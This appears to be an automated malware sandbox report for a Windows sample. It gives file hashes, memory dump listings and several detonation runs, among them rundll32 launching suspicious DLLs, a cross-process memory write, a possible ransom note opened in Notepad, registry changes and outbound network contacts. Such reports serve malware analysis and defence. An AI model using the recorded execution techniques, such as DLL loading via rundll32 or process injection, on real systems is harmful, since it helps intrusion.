C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 6dd7f70cddc4310e047032d70550f72c
SHA1 e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562
SHA256 e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d
SHA512 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c

memory/868-77-0x0000000000240000-0x000000000024C000-memory.dmp

memory/868-78-0x0000000005040000-0x000000000553E000-memory.dmp

memory/868-79-0x0000000004A90000-0x0000000004B22000-memory.dmp

memory/868-80-0x0000000004C10000-0x0000000004C1A000-memory.dmp

memory/868-81-0x0000000004CB0000-0x0000000004D16000-memory.dmp

memory/1192-84-0x0000000004970000-0x00000000049A6000-memory.dmp

memory/1192-85-0x00000000074E0000-0x0000000007B08000-memory.dmp

memory/1192-86-0x00000000073E0000-0x0000000007402000-memory.dmp

memory/1192-87-0x0000000007CF0000-0x0000000007D56000-memory.dmp

memory/1192-88-0x0000000007DD0000-0x0000000008120000-memory.dmp

memory/1192-89-0x0000000007BD0000-0x0000000007BEC000-memory.dmp

memory/1192-90-0x0000000008520000-0x000000000856B000-memory.dmp

memory/1192-91-0x00000000085F0000-0x0000000008666000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybfkvbxl.3bg.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

132s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Settings.ini

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Settings.ini

Network

Country Destination Domain Proto
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

133s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3d9xx.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3d9xx.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240611-en

Max time kernel

52s

Max time network

61s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3360 wrote to memory of 4712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1

Network

Country Destination Domain Proto
GB 87.248.205.0:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

132s

Max time network

135s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\licension.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\licension.dll,#1

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

132s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\open me - 1212.txt"

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\open me - 1212.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

130s

Max time network

137s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\[email protected]

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp

Files

N/A